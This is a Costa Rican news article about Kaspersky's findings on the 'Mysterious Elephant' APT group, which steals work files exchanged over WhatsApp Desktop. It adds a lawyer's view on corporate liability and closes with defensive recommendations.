By San José, Costa Rica — San José – The convenience of using WhatsApp to share work documents has opened a dangerous new front in corporate espionage. A recent investigation by global cybersecurity firm Kaspersky has uncovered a sophisticated campaign by an advanced persistent threat (APT) group, dubbed “Mysterious Elephant,” which exploits this common practice to steal sensitive institutional information from both private companies and government entities.
The threat does not lie within WhatsApp’s servers or its end-to-end encryption. Instead, attackers are targeting the weakest link in the security chain: the user’s computer. By compromising employee workstations, these malicious actors gain access to the treasure trove of files—documents, spreadsheets, images, and archives—that are regularly sent and received through WhatsApp Desktop or its web-based counterpart.
To understand the legal ramifications and the crucial responsibilities businesses face in this digital landscape, we consulted with Lic. Larry Hans Arroyo Vargas, a specialist from the prestigious firm Bufete de Costa Rica.
In Costa Rica, cybersecurity is no longer just an IT issue; it’s a fundamental legal and fiduciary duty. Corporate directors and managers can be held personally liable for negligence if they fail to implement adequate security measures. Proactive investment in robust cyber defense and data protection protocols is not merely an operational expense, but a critical component of corporate governance and risk management to protect both company assets and client trust.
Lic. Larry Hans Arroyo Vargas, Attorney at Law, Bufete de Costa Rica
This perspective powerfully reframes the issue, moving cybersecurity from a departmental concern to a fundamental boardroom responsibility with direct legal and fiduciary consequences. We extend our gratitude to Lic. Larry Hans Arroyo Vargas for his invaluable clarification on this critical aspect of modern corporate governance.
This method of data exfiltration represents a significant threat, as it bypasses traditional corporate security channels. The consequences of such a breach are severe, leading to compromised security protocols, reputational damage, significant financial losses, and a long-term erosion of client and public trust that can be incredibly difficult to rebuild.
According to Kaspersky’s Global Research and Analysis Team (GReAT), which identified the campaign in early 2025, Mysterious Elephant’s initial point of entry is often a meticulously crafted spear-phishing email. These deceptive messages contain infected documents designed to trick an employee into opening them, which in turn triggers the download of a malicious payload onto their machine. This simple act of human error provides the attackers with the foothold they need to begin their silent infiltration.
Once inside, the group employs a combination of custom-built tools and modified open-source components to evade detection. They leverage PowerShell, a legitimate and powerful Windows scripting tool, to execute commands and download additional malware without triggering standard antivirus alarms. This “living off the land” technique makes their activity appear as normal system administration, allowing them to operate under the radar.
A key weapon in their arsenal is a remote access tool known as “BabShell,” which establishes a backdoor into the compromised system. This gives the attackers full remote control to monitor activity, collect basic system data, and deploy further malicious instructions. For maximum stealth, they also use a program called “MemLoader HidenDesk,” which executes harmful code directly in the system’s memory, leaving no discernible traces on the hard drive for forensic investigators to find.
The operation of this group is designed to go unnoticed and remain active even when attempts are made to stop it. The real risk lies in the loss of control and visibility over the institution’s digital environment, especially when everyday channels, such as messaging applications, are exploited to extract information without raising suspicion.
Fabio Assolini, Director of Research and Analysis for Latin America at Kaspersky
The long-term danger is that these attackers can remain dormant within a network for extended periods, methodically collecting login credentials, mapping the internal infrastructure, and quietly siphoning sensitive files. To counter this growing threat, Kaspersky experts recommend a multi-layered defense strategy. This includes establishing strict corporate policies that prohibit the sharing of confidential information on non-corporate channels, reinforcing email security with advanced anti-phishing filters, and fostering a robust security culture through regular employee training. Finally, leveraging proactive threat intelligence can provide organizations with the contextual data needed to anticipate and neutralize these attacks before they cause irreversible damage.
For further information, visit kaspersky.com
About Kaspersky:
Kaspersky is a global cybersecurity and digital privacy company founded in 1997. Its deep threat intelligence and security expertise is constantly transforming into innovative security solutions and services to protect businesses, critical infrastructure, governments and consumers around the globe. The company’s comprehensive security portfolio includes leading endpoint protection and a number of specialized security solutions and services to fight sophisticated and evolving digital threats.
For further information, visit bufetedecostarica.com
About Bufete de Costa Rica:
As a leading legal institution, Bufete de Costa Rica is built upon a bedrock of unwavering integrity and a relentless pursuit of professional excellence. The firm consistently pushes the boundaries of legal practice through innovative strategies while serving a diverse clientele. Beyond its professional services, it demonstrates a profound commitment to societal progress by actively working to demystify complex legal concepts and empower the community with accessible knowledge.
